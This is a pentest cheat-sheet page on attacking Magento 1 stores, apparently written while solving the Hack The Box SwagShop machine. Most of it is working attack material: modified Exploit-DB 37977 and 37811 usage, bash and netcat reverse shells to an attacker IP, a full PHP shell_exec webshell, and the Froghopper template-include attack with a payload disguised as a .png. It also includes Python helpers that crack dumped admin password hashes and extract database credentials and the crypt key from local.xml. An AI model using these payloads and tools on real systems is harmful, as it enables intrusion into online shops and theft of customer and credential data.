# Magento

## Magento CMS

* <https://magento.com>
* Magento is an open-source e-commerce platform written in PHP
* <https://magento.com/blog/magento-news/magento-community-edition-1.9.1-now-available-download>
* <https://docs.magento.com/m1/ce/user_guide/configuration/url-admin-custom.html>

## Scan

* Magescan
* <https://github.com/steverobbins/magescan>
* Reports the Magento version, installed modules and exposed files (an exposed `app/etc/local.xml` leaks the DB credentials, crypt key and install date)
* Default admin page: <http://10.x.x.x/index.php/admin> (the `admin` path segment is the adminhtml `frontName` from local.xml, so it differs on a store with a custom admin URL, see the doc linked above)

```
> php magescan.phar scan:all 10.x.x.x
```

## Create Admin

* Exploit-DB 37977 ("Magento eCommerce - Remote Code Execution", patched by SUPEE-5344)
* Magento eCommerce- Remote code Execution-37977.py
* Despite the title, the script uses an unauthenticated SQL injection in the `Cms_Wysiwyg` directive controller to insert a new admin user (forme:forme by default)

```
searchsploit magento
Magento eCommerce- Remote code Execution-37977.py
vi 37977.py
target = "http://10.x.x.x"
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"   ..add /index.php/ when the store has no URL rewrites

python 37977.py
Log in at http://swagshop.htb/index.php/admin/ with the admin user the script created:
forme:forme
```
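The script above works by inserting a row into `admin_user`, whose `password` column uses Magento 1's salted-hash layout. The helper below is an added example (not part of 37977.py or of Magento) that shows that layout, so the forme:forme login can be checked against a dumped `admin_user` row or a dumped hash can be attacked offline. The md5 form is what CE 1.9.0 writes (2-character salt); the sha256 branch covers the later 1.9.x releases that kept the same `digest:salt` layout. The `rp` salt in the demo is just a fixed value for reproducibility, not something the exploit is claimed to use.

```python
import hashlib
import secrets
import string

# Magento 1 admin_user.password layout: "<hexdigest of salt+password>:<salt>".
# CE 1.9.0 hashes with MD5 and a 2-character salt; later 1.9.x releases use
# SHA-256 in the same layout. verify() tells them apart by digest length
# (32 hex chars = md5, 64 hex chars = sha256), as Magento's own validator does.
_ALGO_BY_LEN = {32: "md5", 64: "sha256"}
_SALT_CHARS = string.ascii_letters + string.digits


def magento1_hash(password, salt=None, algo="md5"):
    """Build the stored value for `password`; a random 2-char salt is drawn if none is given."""
    if salt is None:
        salt = "".join(secrets.choice(_SALT_CHARS) for _ in range(2))
    digest = hashlib.new(algo, (salt + password).encode()).hexdigest()
    return f"{digest}:{salt}"


def magento1_verify(password, stored):
    """Check `password` against a stored hash; a legacy unsalted value (no ':') is also accepted."""
    digest, _, salt = stored.partition(":")
    algo = _ALGO_BY_LEN.get(len(digest))
    if algo is None:
        return False
    candidate = hashlib.new(algo, (salt + password).encode()).hexdigest()
    return secrets.compare_digest(candidate, digest)


def crack_magento1(stored, wordlist):
    """Offline guess against one dumped admin_user row; returns the matching word or None."""
    return next((word for word in wordlist if magento1_verify(word, stored)), None)


if __name__ == "__main__":
    # constructed demo: a forme:forme row with a fixed salt, then recovered from a tiny wordlist
    row = magento1_hash("forme", salt="rp")
    print(row, magento1_verify("forme", row))
    print(crack_magento1(row, ["admin", "password", "forme"]))
```

Feed `crack_magento1` the `password` column from `SELECT username, password FROM admin_user` once the DB creds from local.xml give you MySQL access; a 32-hex digest with a 2-character salt is cheap to brute force offline.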

## Authenticated RCE 37811

* Must have an admin user/pass for this to work (e.g. the forme:forme account from 37977)
* Must have the `install_date` from `app/etc/local.xml` (the `<install><date>` value, passed verbatim)
* The stock script needs several tweaks before it works: the admin login path, the login form controls and the dashboard orders period, all shown below
* <https://joshuasuren.medium.com/hack-the-box-swagshop-write-up-18-1c18fecf885a>

```
-------------------
Authenticated RCE: 37811.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution

vi 37811.py
username='forme'
password='forme'
install_date='Wed, 08 May 2019...'      ..verbatim from <install><date> in app/etc/local.xml

-------------------
Errors:
ippsec pointed the script at the full admin login path rather than the bare host:
python exec.py http://10.x.x.x/index.php/admin/ 'whoami'

-------------------
Other bloggers replaced the login-form filling with explicit controls:
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwdone = br.find_control(name="login[password]", nr=0)
pwdone.value = password

-------------------
More errors: widen the dashboard orders period from 7d to 2y. The script scrapes the
"last orders" tab for a row to work with, and a store with no orders in the last 7 days
returns an empty table:
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
                                                 ^^ was 7d
-------------------
python 37811.py http://$IP "whoami"                     ..error: needs the admin path
python 37811.py http://$IP/index.php/admin/ "whoami"    ..works
python 37811.py http://$IP/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.x.x.x/9001 0>&1'"

nc -nvlp 9001            ..same port as in the /dev/tcp payload
whoami
www-data
```
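Two steps on this page depend on `app/etc/local.xml`: the credential leak Magescan flags in the Scan section, and the `install_date` that 37811.py needs verbatim. The parser below is an added example (not code from the page, the exploit or Magento) that pulls those fields out of the file. The XML it runs on is a constructed sample in the layout Magento 1 writes at install time, with made-up values; point it at a real file by passing the path as the first argument. The `admin_url` helper reads the adminhtml `frontName` from the same file, which is the value a custom admin URL changes.

```python
import sys
import xml.etree.ElementTree as ET

# Constructed sample in the layout Magento 1 writes to app/etc/local.xml at
# install time. Every value here is made up; on a target the file is fetched
# (or read after a foothold) from <webroot>/app/etc/local.xml.
SAMPLE_LOCAL_XML = """<?xml version="1.0"?>
<config>
    <global>
        <install>
            <date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>
        </install>
        <crypt>
            <key><![CDATA[0123456789abcdef0123456789abcdef]]></key>
        </crypt>
        <resources>
            <db>
                <table_prefix><![CDATA[]]></table_prefix>
            </db>
            <default_setup>
                <connection>
                    <host><![CDATA[localhost]]></host>
                    <username><![CDATA[magento_dbuser]]></username>
                    <password><![CDATA[Constructed-DB-Password-1]]></password>
                    <dbname><![CDATA[magento_db]]></dbname>
                    <active>1</active>
                </connection>
            </default_setup>
        </resources>
    </global>
    <admin>
        <routers>
            <adminhtml>
                <args>
                    <frontName><![CDATA[admin]]></frontName>
                </args>
            </adminhtml>
        </routers>
    </admin>
</config>
"""

# element path -> output key: the install date feeds 37811.py, the connection
# block gives direct MySQL access, frontName is the admin URL path segment
FIELDS = {
    "install_date": "global/install/date",
    "crypt_key": "global/crypt/key",
    "db_host": "global/resources/default_setup/connection/host",
    "db_user": "global/resources/default_setup/connection/username",
    "db_pass": "global/resources/default_setup/connection/password",
    "db_name": "global/resources/default_setup/connection/dbname",
    "table_prefix": "global/resources/db/table_prefix",
    "admin_frontname": "admin/routers/adminhtml/args/frontName",
}


def parse_local_xml(xml_text):
    """Return the pentest-relevant fields of a local.xml; missing or empty fields come back as None."""
    root = ET.fromstring(xml_text)
    out = {}
    for key, path in FIELDS.items():
        node = root.find(path)
        text = (node.text or "").strip() if node is not None else ""
        out[key] = text or None
    return out


def admin_url(base, fields):
    """Admin login URL for a base like http://10.x.x.x, honouring a custom frontName."""
    front = fields.get("admin_frontname") or "admin"
    return f"{base.rstrip('/')}/index.php/{front}/"


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOCAL_XML
    fields = parse_local_xml(text)
    for key, value in fields.items():
        print(f"{key:16} {value}")
    print(admin_url("http://10.x.x.x", fields))
```

The `install_date` string goes into 37811.py unchanged; the `db_*` fields are what you try against MySQL (and, via `admin_user`, what lets you check or reset the admin password) once you have a foothold or the database is exposed.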

## Upload IDE

* Requires Admin login
* System > Magento Connect > Magento Connect Manager > **Direct Package File Upload**
* Download: [Magpleasure\_Filesystem-1.0.0.tgz](http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz)

```
---------------
http://$IP/index.php/admin/
Login with Admin

System > Magento Connect > Magento Connect Manager

Check Box: Put store on the maintenance mode while installing
Direct Package File Upload > Browse
Magpleasure_Filesystem-1.0.0.tgz      ..the package downloaded from the connect20 URL above
Upload!

---------------
System > Filesystem > IDE
Edit "cron.php" (sits in the web root, so it is reachable without logging in)
Replace its contents with a php webshell

Get your shell
http://10.x.x.x/cron.php

Through the webshell, run a python reverse shell back to your listener
nc -nvlp 4444
whoami
www-data
```

## Froghopper Attack (RCE)

* Requires Admin login
* <https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper>
* Upload a PHP payload with a `.png` extension as a category thumbnail (it lands under `media/` and is served, not executed, until a template includes it)
* Enable "Allow Symlinks" so the template validator accepts a template path outside the theme directory
* Point a newsletter template's `core/template` block at the uploaded file and preview it; the file is included as PHP

```
http://swagshop.htb/index.php/admin/
Login with Admin

-------------------
Create the "png" (a PHP reverse shell with an image extension)

echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png

-------------------
System > Configuration > Advanced > Developer > Template Settings
Allow Symlinks: "Yes"

-------------------
Catalog > Manage Categories
Add Root Category (or Add Subcategory) > General Information
Thumbnail Image: Browse "shell.php.png" > Save Category
http://10.x.x.x/media/catalog/category/shell.php.png   ..confirm the upload (served as a plain file here)

-------------------
Newsletter > Newsletter Templates > Add New Template (or edit an existing one)
Template Content:
{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}
Save Template

-------------------
Preview Template: the core/template block includes the traversed path as PHP,
which "Allow Symlinks" lets through the template path check. Catch the shell:

nc -nvlp 4444
whoami
www-data
```

## Upload Evil Plugin

* Requires Admin login
* Magmi (Magento Mass Importer) plugins are just PHP files in a zip; if `/magmi/web/magmi.php` is reachable, its plugin upload accepts an arbitrary zip
* Zip an evil [php](https://pentest.mxhx.org/04-webapps/php-tricks) webshell and upload it as a plugin
* Did not work on SwagShop (HTB)

```
http://$IP/magmi/web/magmi.php                               ..is magmi installed?
http://$IP/index.php/admin/Cms_Wysiwyg/directive/index/      ..37977 endpoint, noted while enumerating
http://$IP/index.php/admin/Cms_Wysiwyg/directive/key/905d7.../

-------------------
vi evil.php

<?php
// minimal POST webshell: the same form is shown whether or not a command was sent
echo "<form action='evil.php' method='post'>
        <input type='text' name='command' value=''/>
        <input type='submit' value='execute'/>
      </form>";

if (isset($_POST['command']) && function_exists('shell_exec')) {
    $command = $_POST['command'];
    $output = shell_exec($command);
    echo "<pre>$output</pre>";
}
?>

-------------------
> zip evil.zip evil.php

Upload new plugins:
click on "choose file" > evil.zip

-------------------
Execute:
http://10.x.x.x/magmi/plugins/evil.php
```
